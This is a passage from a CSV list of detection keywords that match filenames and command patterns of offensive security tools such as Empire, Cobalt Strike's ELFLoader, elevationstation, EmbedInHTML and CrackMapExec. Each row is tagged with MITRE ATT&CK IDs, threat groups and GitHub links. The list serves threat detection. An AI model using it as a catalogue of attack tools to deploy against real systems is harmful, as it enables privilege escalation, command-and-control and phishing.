Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*elevationstation.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*elevationstation.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*elevationstation.git*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*elevationstation.sln*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*elevationstation-main*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z
-*ElevenPaths*FOCA*,offensive_tool_keyword,FOCA,FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.,T1556 - T1566 - T1213 - T1212 - T1565,TA0005 - TA0009,N/A,N/A,Information Gathering,https://github.com/ElevenPaths/FOCA,1,0,N/A,N/A,10,2495,519,2022-12-08T09:31:55Z,2017-10-02T17:05:06Z
-*ELFLoader.c*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z
-*ELFLoader.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*ELFLoader.out*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*elite-proxy-finder*,offensive_tool_keyword,elite-proxy-finder,Finds elite anonymity (L1) HTTP proxies then tests them all in parallel. Tests each proxy against 3 IP checking URLs including one which is HTTPS to make sure it can handle HTTPS requests. Then checks the proxy headers to confirm its an elite L1 proxy that will not leak any extra info. By default the script will only print the proxy IP. request time. 
and country code of proxies that pass all four tests but you can see all the results including errors in any of the tests with the -a (--all) option.,T1586.001 - T1041.002 - T1105.002 - T1573.001 - T1135.002 - T1134.002 - T1016.001,TA0011 - TA0010 - TA0005 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/DanMcInerney/elite-proxy-finder,1,1,N/A,N/A,3,247,106,2016-11-23T10:31:33Z,2014-04-17T11:23:20Z -*emailall.py -*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*emailall.py check*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,0,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*EmailAll-master.*,offensive_tool_keyword,EmailAll,EmailAll is a powerful Email Collect tool,T1114.001 - T1113 - T1087.003,TA0009 - TA0003,N/A,N/A,Reconnaissance,https://github.com/Taonn/EmailAll,1,1,N/A,6,6,577,101,2022-03-04T10:36:41Z,2022-02-14T06:55:30Z -*embedInHTML.html*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,N/A,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*embedInHTML.py*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*EmbedInHTML-master*,offensive_tool_keyword,EmbedInHTML,What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.,T1027 - T1566.001,TA0005 - TA0002,N/A,N/A,Phishing,https://github.com/Arno0x/EmbedInHTML,1,1,N/A,10,5,458,144,2017-09-27T13:16:06Z,2017-09-11T07:17:20Z -*empire AttackServers*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*Empire Framework GUI*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - 
T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*empire --rest *,offensive_tool_keyword,empire,empire command lines patterns,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*empire --server *,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 ,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,0,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*Empire.Agent.Coms.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.Jobs.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*Empire.Agent.Stager.*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,0,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*empire/client/*.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 
- T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/*.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/downloads/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - 
T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire/server/downloads/logs/*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - 
T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire_exec.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*empire_server.*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empireadmin*,offensive_tool_keyword,empire,Empire is a 
post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*empire-chain.pem*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 
T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*EmpireCORSMiddleware*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*Empire-GUI.git*,offensive_tool_keyword,empire,The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework,T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001,TA0002 - TA0010 - TA0011 
,N/A,N/A,C2,https://github.com/EmpireProject/Empire-GUI,1,1,N/A,10,10,471,145,2022-03-10T11:34:46Z,2018-04-20T21:59:52Z -*Empire-master*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 